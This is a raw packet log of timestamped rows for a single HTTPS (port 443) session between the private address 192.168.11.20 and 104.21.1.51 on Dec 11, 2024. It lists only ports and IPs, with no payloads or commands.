Dec 11, 2024 12:30:17.757584095 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.757726908 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.759597063 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.759639978 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.759913921 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.759952068 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.760147095 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.761239052 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.761280060 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.761455059 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.761455059 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.761502981 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.761502981 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.761526108 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.761553049 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.761730909 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.763155937 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.763197899 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.763442993 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.763442993 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.763472080 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.763681889 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.764978886 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.765018940 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.765564919 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.765607119 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.765607119 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.765625954 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.765731096 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.765774012 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.766782045 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.766824007 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.767014027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.767014027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.767056942 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.767071009 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.767071962 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.767222881 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.768898010 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.768942118 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.769047022 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.769047022 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.769087076 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.769087076 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.769102097 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.769134998 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.769237041 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.770627975 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.770668983 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.770832062 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.770832062 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.770878077 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.770896912 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.770962000 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.771070957 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.772418022 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.772459030 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.772600889 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.772600889 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.772649050 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.772649050 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.772669077 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.772691965 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.772845984 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.774189949 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.774250031 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.774385929 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.774385929 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.774429083 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.774429083 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.774447918 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.774477005 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.774590969 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.776869059 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.776910067 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.777045965 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.777095079 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.777096033 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.777113914 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.777141094 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.777141094 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.777312040 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.778517008 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.778558969 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.778707027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.778707027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.778753042 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.778753042 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.778774023 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.778796911 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.778950930 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.780088902 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.780132055 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.780533075 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.780581951 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.780679941 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.780702114 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.780726910 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.780908108 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.782546997 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.782582998 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.782779932 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.782779932 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.782819033 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.782850027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.783019066 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.784512043 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.784555912 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.784702063 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.784703016 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.784749031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.784749031 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.784770012 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.784795046 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.784975052 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.786220074 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.786283016 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.786386967 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.786387920 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.786463976 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.786495924 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.786556005 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.786694050 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.793797016 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.793831110 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794014931 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794014931 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794049025 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794064999 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794183969 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794225931 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794258118 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794397116 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794397116 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794431925 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794447899 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794480085 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794480085 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794647932 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794663906 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794680119 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794838905 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794905901 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.794913054 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.794994116 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.795028925 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.795048952 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.795114040 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.795234919 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.795234919 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.795272112 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.795373917 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.795885086 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.795923948 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.796072960 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.796072960 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.796097040 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.796207905 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.797962904 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.797995090 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.798110962 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.798110962 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.798139095 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.798157930 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.798157930 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.798212051 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.798278093 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.799602985 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.799626112 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.799820900 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.799854040 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.799947977 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.799948931 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.799969912 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.800035000 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.800035000 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.801522970 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.801561117 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.801661968 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.801661968 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.801681995 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.801757097 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.801814079 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.803201914 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.803236008 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.803374052 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.803374052 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.803404093 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.803405046 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.803420067 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.803515911 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.805001974 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.805043936 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.805119991 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.805141926 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.805161953 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.805211067 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.805211067 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.805262089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.805310965 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.807241917 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.807271957 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.807378054 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.807452917 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.807452917 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.807466030 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.807503939 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.809039116 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.809077024 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.809187889 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.809187889 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.809206009 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.809230089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.809230089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.809278011 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.809326887 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.810880899 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.810914040 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.811022997 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.811022997 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.811050892 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.811069965 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.811175108 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.812522888 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.812553883 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.812655926 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.812768936 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.812781096 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.812853098 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.814426899 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.814467907 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.814605951 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.814605951 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.814631939 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.814649105 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.814649105 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.814697981 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.814747095 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.816508055 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.816549063 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.816663027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.816663027 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.816682100 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.816705942 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.816705942 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.816755056 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.816802979 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.818320990 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.818350077 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.818470001 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.818470001 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.818516970 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.818517923 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.818531990 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.818566084 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.818612099 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.820411921 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.820446014 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.820563078 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.820563078 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.820580006 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.820605993 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.820605993 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.820653915 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.820704937 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.822696924 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.822726011 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.822875977 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.822875977 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.822916985 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.822916985 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.822936058 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.822963953 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.822963953 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.824489117 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.824526072 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.824656010 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.824656010 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.824690104 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.824711084 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.824711084 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.824754000 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.824754000 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.825936079 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.825965881 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.826123953 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.826147079 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.826169968 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.826170921 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.826225996 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.827677011 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.827776909 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.827843904 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.827877045 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.827944040 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.827944040 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.827981949 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.989532948 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.989567995 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.989743948 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.989744902 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.989780903 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.989801884 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.989849091 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.990423918 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.990972042 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.991008997 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.991182089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.991182089 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.991220951 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.991236925 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.991311073 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.991455078 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.992624998 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.992638111 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.992784023 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.992784023 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.992862940 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.992875099 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.992882013 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.993057966 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.994183064 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.994196892 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.994365931 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.994365931 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.994462967 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.994462967 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.994474888 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.994659901 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.995997906 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.996010065 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.996181965 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.996181965 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.996277094 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.996277094 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.996288061 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.996475935 CET	49761	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:30:17.997648001 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.997658968 CET	443	49761	104.21.1.51	192.168.11.20
Dec 11, 2024 12:30:17.998846054 CET	49761	443	192.168.11.20	104.21.1.51
